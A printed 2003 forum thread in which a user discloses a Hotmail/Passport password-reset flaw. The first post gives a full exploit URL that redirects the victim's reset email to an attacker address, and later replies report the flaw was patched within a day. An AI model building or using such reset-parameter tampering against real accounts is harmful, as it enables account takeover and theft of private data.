General Discussion - Hotmail Security Hole

Print Page | Close Window

Hotmail Security Hole

Printed From: Web Wiz Forums
Category: General Discussion
Forum Name: General Discussion
Forum Description: General discussion and chat on any topic.
URL: https://forums.webwiz.net/forum_posts.asp?TID=2562
Printed Date: 29 March 2026 at 2:58pm
Software Version: Web Wiz Forums 12.08 - https://www.webwizforums.com

Topic: Hotmail Security Hole

Posted By: hockenpj
Subject: Hotmail Security Hole
Date Posted: 09 May 2003 at 1:59pm

Hotmail & Passport (.NET Accounts) Vulnerability

There is a very serious and stupid vulnerability or badcoding in Hotmail / Passports (.NET Accounts)

I tried sending e-mails several times to Hotmail / Passport contact addresses, but always met with the NLP bots.

I guess I dont need to go in details of how cruical and important Hotmail / Passports .NET Account passport is to anyone.

You name it and they have it, E-Commerce, Credit Card processing, Personal Emails, Privacy Issues, Corporate Espionage, maybe stalkers and what not.

It is so simple that it is funny.

All you got to do is hit the following in your browser:

https://register.passport.net/emailpwdreset.srf?lc=1033&em=victim@hotmail.com&id=&cb=&prefem=attacker@attacker.com&rst=1 - https://register.passport.net/emailpwdreset.srf?lc=1033&em=victim@hotmail.com&id=&cb=&prefem=attacker@attacker.com&rst=1

And you'll get an email on attacker@attacker.com asking you to click on a url something like this:

http://register.passport.net/emailerror.srf?lc=1033 - http://register.passport.net/emailerror.srf?lc=1033

From that url, you can reset the password and I don't think I need to say anything more about it.

Replies:

Posted By: Gullanian
Date Posted: 09 May 2003 at 5:15pm

oops!

Posted By: Gullanian
Date Posted: 09 May 2003 at 5:21pm

doesnt work hehe

Posted By: hockenpj
Date Posted: 10 May 2003 at 3:06am

I worked for me but I have just tired it again and it doesn't work so they must have made a patch for it!

I was able to reset the password on my account and then send the new password to a non-hotmail account of my choice.

Posted By: the boss
Date Posted: 11 May 2003 at 1:05am

doesnt work for me too...

Posted By: Bunce
Date Posted: 11 May 2003 at 3:09am

They fixed it Thursday night. Apparently the guy who found it tried to email them about the bug 10 times and gave up so he posted in on the net. Was only public for a day before it was fixed.

Apparently no-one else had expoited it before then.

-------------
There have been many, many posts made throughout the world...
This was one of them.